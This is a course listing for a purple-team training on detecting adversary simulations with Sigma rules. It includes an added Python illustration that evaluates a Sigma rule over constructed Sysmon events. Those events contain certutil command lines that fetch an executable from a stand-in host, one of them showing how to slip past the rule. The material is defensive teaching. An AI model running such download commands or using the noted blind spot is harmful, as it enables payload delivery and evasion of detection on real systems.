In & Out (Purple Edition) – Detection as Code vs Adversary Simulations

This training is based on PurpleLABS – a dedicated virtual infrastructure for conducting detection and analysis of attackers’ behavior in terms of used techniques, tactics, procedures, and offensive tools. The environment has been set up to serve the constant improvement of competences in the field of threat hunting (threat hunting) and learning about current trends of offensive actions (red-teaming) vs detection phases (blue-teaming).

Original price: $4,299.00. Current price: $3,299.00.

Duration

3 days

Delivery Method

virtual

Level

advanced

Seats Available

20

Class mode: VIRTUAL LIVE STREAM

Ask us about upcoming dates!

This special In & Out – Detection as Code vs Adversary Simulations – Purple Edition (Red and Blue on Steroids) is an advanced, fast-track, lab-based training created to present participants with:

  • The importance of Blue and Red team cooperation
  • Advanced detection methods and techniques against exfiltration and lateral movement, including event mapping, grouping, and tagging
  • The tactics and behaviors of an adversary after gaining initial access to the network (Linux/Windows)
  • Detection methods for C2 traffic, tunneling, hiding, pivoting, and custom simulated malicious network events
  • The capabilities of many popular open source tools and their integration with 3rd-party security (IDS/IPS/WAF/EDR/FPC) and analytics solutions against adversaries' C2-based actions
  • Verification methods and techniques that IT security product and service providers can use for internal testing and PoC / PoV programs

The primary goal of this training is to generate offensive attack events and symptoms within the PurpleLABS infrastructure that should later be detected by an open source SOC stack, including Sigma, the open, vendor-agnostic signature format for log-based detection rules, and the rest of the dedicated open source security solutions in use.

Participants will thoroughly familiarize themselves with the content and structure of the available Sigma detection rules, better understand the essence of offensive actions, learn the low-level relationships between data sources, and thus gain the knowledge needed to create their own detection rules and, eventually, to bypass them.
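As an added illustration of the rule structure and detection-versus-bypass idea described above (this is not course or PurpleLABS material), the following Python script shows a Sigma rule in its usual title / logsource / detection / condition layout together with a minimal evaluator that runs it over constructed Sysmon process-creation events. The rule, the allow-list filter on a hypothetical approved_updater.exe parent process, and the event records are all assumptions made for this example; the certutil -urlcache download the rule flags and the -verifyctl variant it misses are the kind of rule/gap pair the text refers to.

```python
r"""Minimal Sigma-style rule evaluator over constructed Sysmon process-creation events.

Added illustration, not course or PurpleLABS code. RULE is the Python form of this
hypothetical Sigma rule:

    title: Certutil Download From Remote Host
    logsource:
        product: windows
        category: process_creation
    detection:
        selection:
            Image|endswith: '\certutil.exe'
            CommandLine|contains|all:
                - '-urlcache'
                - 'http'
        filter:
            ParentImage|endswith: '\approved_updater.exe'
        condition: selection and not filter
"""

RULE = {
    "title": "Certutil Download From Remote Host",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "http"],
        },
        # Allow-list: a hypothetical vendor updater that legitimately calls certutil.
        "filter": {"ParentImage|endswith": "\\approved_updater.exe"},
        "condition": "selection and not filter",
    },
}


def _match_value(actual, pattern, modifiers):
    """Compare one field value with one pattern; Sigma string matching is case-insensitive."""
    if actual is None:
        return False
    value, pat = str(actual).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return pat in value
    if "startswith" in modifiers:
        return value.startswith(pat)
    if "endswith" in modifiers:
        return value.endswith(pat)
    return value == pat


def _match_field(event, key, patterns):
    """'Field|mod1|mod2: [v1, v2]' is OR over the values, or AND when the 'all' modifier is present."""
    field, *modifiers = key.split("|")
    values = patterns if isinstance(patterns, list) else [patterns]
    hits = [_match_value(event.get(field), p, modifiers) for p in values]
    return all(hits) if "all" in modifiers else any(hits)


def _match_selection(event, selection):
    """A map is AND over its fields; a list of maps is OR over the maps."""
    if isinstance(selection, list):
        return any(_match_selection(event, item) for item in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """Evaluate the rule's condition (and / or / not over selection names) for one event."""
    detection = rule["detection"]
    results = {name: _match_selection(event, sel)
               for name, sel in detection.items() if name != "condition"}
    expr = []
    for tok in detection["condition"].replace("(", " ( ").replace(")", " ) ").split():
        if tok in ("and", "or", "not", "(", ")"):
            expr.append(tok)
        elif tok in results:
            expr.append(str(results[tok]))
        else:
            raise ValueError(f"unsupported condition token: {tok!r}")
    # Only the literals True/False and boolean operators reach eval().
    return bool(eval(" ".join(expr), {"__builtins__": {}}, {}))


def _sysmon(cmdline, parent="C:\\Windows\\System32\\cmd.exe"):
    """Constructed Sysmon Event ID 1 record, trimmed to the fields the rule needs."""
    return {"Image": "C:\\Windows\\System32\\certutil.exe",
            "CommandLine": cmdline, "ParentImage": parent}


EVENTS = [
    # 0: classic LOLBin download, should match
    _sysmon("certutil -urlcache -split -f http://198.51.100.7/p.exe C:\\Users\\Public\\p.exe"),
    # 1: benign certutil use, no download flags
    _sysmon("certutil -hashfile C:\\Temp\\image.iso SHA256"),
    # 2: download from the allow-listed (hypothetical) updater, suppressed by the filter
    _sysmon("certutil -urlcache -f http://updates.example.internal/ca.crt ca.crt",
            parent="C:\\Program Files\\Vendor\\approved_updater.exe"),
    # 3: same capability via -verifyctl; the rule keys on -urlcache, so this is a blind spot
    _sysmon("certutil -verifyctl -split -f http://198.51.100.7/p.exe"),
]


def run(rule, events):
    """Return the indices of the events the rule fires on."""
    return [i for i, e in enumerate(events) if evaluate(rule, e)]


if __name__ == "__main__":
    print(RULE["title"], "fired on events:", run(RULE, EVENTS))
```

Running the script fires only on event 0: event 2 is suppressed by the filter selection, and event 3 shows why a rule keyed on a single switch rather than on the behaviour (an outbound URL on a certutil command line) leaves a gap an attacker can walk through.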

 

Agenda

  • 1. Introduction:

    Introduction to Adversary Simulations and open source attack emulation projects: ● Atomic Red Team ● PurpleSharp ● RTA ● APTSimulator ● DumpsterFire ● Firebolt ● Flightsim ● BYOB ● Metta ● Infection Monkey ● Caldera and more

  • 2. MITRE ATT&CK framework & Sigma rules:

    Detection map built on the MITRE ATT&CK framework and Sigma rules, based on recent examples of chained attack scenarios.

  • 3. Finding malicious artifacts using YARA, ssdeep, Volatility and memtriage:

    ● How YARA works and why it could be your best friend ● yarascan + Volatility Framework ● memtriage ● YARA vs webshells

  • 4. Collecting, analyzing and correlating data from different data sources using:

    ● Splunk ● HELK (Hunting ELK) ● Wazuh ● Graylog ● NetFlow ● Zeek IDS ● Suricata IDS ● Moloch (now Arkime) FPC ● auditd / go-audit ● eBPF ● osquery ● Velociraptor

  • 5. Windows Sysinternals Suite:

    ● Sysmon event types: ○ Process execution events ○ Network connection events ○ Image load events ○ Named pipe events ○ WMI events ○ PsExec events
    ● Other Sysinternals tools: ○ Process Explorer ○ Process Monitor ○ Autoruns
    ● Evidence traces of file download and execution: ○ cmd.exe ○ HTA ○ JS ○ VBS ○ WSF ○ JSE ○ C# ○ certutil ○ PowerShell ○ BITSAdmin
    ● Shellcode injection techniques
    ● WebDAV / SMB / NFS share mapping

  • 6. Low level Linux security tracing and profiling for critical services:

    ● eBPF ● sysdig

  • 7. Playing with Zeek IDS / Suricata IDS for anomaly detection → finding malicious artifacts at the network level:

    ● The importance of a network baseline for high-risk environments ● Virtual SPAN / TAP and NetFlow → Open vSwitch ● Feature definition and extraction ● bro-cut (zeek-cut) syntax ● Zeek script index ● Client / server fingerprinting: ○ JA3 ○ HASSH ● Security feature extraction for many different network protocols

  • 8. Detection and traces of C2 and network exfiltration techniques → use cases:

    ● ICMP ● TCP / UDP ● SSL / TLS ● DNS / DoH / DGA / anomalies ● HTTP / HTTP2 / QUIC ● LDAP Exfil ● Dropbox / Twitter / Google / Mozilla / Discord / Slack ● SMB bind named pipes ● Legitimate website covert channel ● Intelligent HTTP C2 Redirection ● Port knocking ● Domain fronting ● ngrok / shooter ● Egress testing and common network traffic on non-standard ports

  • 9. Detection and traces of C2 post-exploitation, lateral movements → use cases:

    ● AD reconnaissance / AD snapshot ● BloodHound artifacts ● Golden Ticket ● Silver Ticket ● Kerberoasting ● RPC over TCP/IP ● DCSync / DCShadow ● Mimikatz agent/server ● Pass the Hash ● smbexec ● Invoke-WMI ● WinRM ● Invoke-PsExec ● PSRemoting ● RDP wrapping
    ● Offensive PowerShell: ○ WMI multiple sessions ○ Remote network relaying ○ Copy VSS ○ Keylogging ○ LSA secrets extraction ○ Sandbox / virtual environment detection ○ UAC bypassing ○ Poisoning LLMNR, NBT-NS, mDNS, WPAD and WSUS ○ SMB ransomware detection ○ Browser pivoting ○ SSH tunneling and pivoting ○ RDP tunneling and pivoting / RDP Inception

  • 10. Detection of brute-force attacks → use cases:

    ● SQL ● AD / Kerberos ● SSH ● Web Apps

  • 11. Windows Malware Persistence Methods:

    ● Service ● Winlogon registry entries ● Run / RunOnce ● Scheduled Tasks ● Startup Folder ● WMI ● DLL

  • 12. Linux Malware Persistence Methods:

    ● Service ● Startup scripts ● SSH magic password ● Port knocking / iptables ● Kernel modules

  • 13. Describing relevant log events and creating detections for them in the generic, open Sigma signature format, by rule category:

    ● Application ● APT ● Linux ● Network ● Proxy ● Web ● Windows

Why You Should Take This Course

This unique ‘Detection as Code vs Adversary Simulations’ approach, in a condensed format, raises the level of RED / BLUE / PURPLE knowledge of both experienced specialists and beginners while keeping the tasks attractive and enjoyable: detection does not have to be boring and tedious!

Who Should Attend

  • Red and Blue team members
  • Security / Data Analysts
  • CIRT / Incident Response Specialists
  • Network Security Engineers
  • SOC members and SIEM Engineers
  • AI / Machine Learning Developers
  • Chief Security Officers and IT Security Directors
 

Key Learning Objectives

  • Learn ways to improve your detection and event correlations skills across many different data sources

  • Find the malicious activities and identify threats details on the network

  • Prepare your SOC team for fast filtering out network noise and allow for better incident response handling

  • Learn current trends, techniques, and tools for network exfiltration and lateral movements

  • Find out how DFIR / IR Open Source Software can support your SIEM infrastructure

  • Understand the value of DLP / IDS / IPS / FW / WAF / Memory Forensics against real adversary lab scenarios

  • Understand values from an automated approach to simulating attackers and generating anomalies

  • Identify blind spots in your network security posture

Prerequisite Knowledge

  • An intermediate level of command-line experience on Linux and Windows
  • Fundamental knowledge of TCP/IP network protocols
  • Penetration testing experience performing enumeration, exploitation, and lateral movement is beneficial, but not required
  • Basic programming skills are a plus, but not essential


What students say about this training

“The content of In & Out was great. Lots of gained knowledge and hands on!”

“Great course! A truly huge number of topics and tools covered.”

“Leszek was a really good trainer; he covered a lot of material and had a very good personality.”

“Leszek Miś is very knowledgeable in the topics covered in the course. He also shares real-life scenarios which were useful for participants to better understand the application of the material presented. Contents were very good; it covers many leading open source projects which I find useful. I would recommend this course to my colleagues.”


Hardware / Software Requirements

  • VPN client installed according to the VPN Setup instructions
  • Slack account (an invite to the dedicated training channel will be sent)
  • Stable internet connection
  • Recommended:
    • Zoom client installed
    • HD camera for 1:1 access to the instructor and the rest of the participants

This training is based on the dedicated PurpleLABS cloud infrastructure, so there are no special requirements for the student's desktop. No more initial setup issues, just a pure training experience!
